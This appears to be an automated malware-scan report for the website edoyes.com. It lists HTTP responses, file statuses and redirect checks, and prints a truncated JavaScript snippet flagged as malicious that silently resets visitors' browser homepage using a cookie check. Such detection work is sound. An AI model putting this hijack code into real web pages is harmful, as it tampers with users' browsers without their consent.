Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=edoyes.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://edoyes.com/ | HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 02:12:17 GMT Accept-Ranges: bytes ETag: "98207fcc1f55d01:1b7c" Server: Microsoft-IIS/6.0 Content-Length: 51802 Content-Location: http://edoyes.com/index.html Content-Type: text/html Last-Modified: Mon, 02 Mar 2015 19:33:45 GMT X-Powered-By: ASP.NET | clean |
http://edoyes.com/index.html | 200 OK Content-Length: 51802 Content-Type: text/html | clean |
http://edoyes.com/abase.js | 200 OK Content-Length: 4139 Content-Type: application/x-javascript | clean |
http://edoyes.com/images/index_fz.js | 200 OK Content-Length: 5513 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var global_html_pool = []; var global_script_pool = []; var global_script_src_pool = []; var global_lock_pool = []; var innerhtml_lock = null; var document_buffer = ""; function set_innerHTML(obj_id, html, time) { if (innerhtml_lock == null) { innerhtml_lock = obj_id; } else if (typeof(time) == "undefined") { global_lock_pool[obj_id + "_html"] = html; window.setTimeout("set_innerHTML } function SetCookie(name,value){ var Days = 1; var exp = new Date(); exp.setTime(exp.getTime() + Days*24*60*60*1000); document.cookie = name + "="+ escape (value) + ";expires=" + exp.toGMTString(); } function setpage(aa,str){ aa.style.behavior="url(#default#homepage)"; var bb=getCookie("username"); if (bb!='easyplay8er') { aa.setHomePage(str); SetCookie("username","easyplay8er"); } } Antivirus reports:
| ||
http://edoyes.com/images/index_fz2.js | 200 OK Content-Length: 343 Content-Type: application/x-javascript | clean |
http://edoyes.com/ad/index_760.js | 404 Not Found Content-Length: 1121 Content-Type: text/html | clean |
http://edoyes.com/test404page.js | 404 Not Found Content-Length: 1121 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: edoyes.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 02:12:17 GMT
Accept-Ranges: bytes
ETag: "98207fcc1f55d01:1b7c"
Server: Microsoft-IIS/6.0
Content-Length: 51802
Content-Location: http://edoyes.com/index.html
Content-Type: text/html
Last-Modified: Mon, 02 Mar 2015 19:33:45 GMT
X-Powered-By: ASP.NET
...51802 bytes of data.
GET / HTTP/1.1
Host: edoyes.com
Result:
HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 02:12:17 GMT
Accept-Ranges: bytes
ETag: "98207fcc1f55d01:1b7c"
Server: Microsoft-IIS/6.0
Content-Length: 51802
Content-Location: http://edoyes.com/index.html
Content-Type: text/html
Last-Modified: Mon, 02 Mar 2015 19:33:45 GMT
X-Powered-By: ASP.NET
...51802 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: edoyes.com
Referer: http://www.google.com/search?q=edoyes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: edoyes.com
Referer: http://www.google.com/search?q=edoyes.com
Result:
The result is similar to the first query. There are no suspicious redirects found.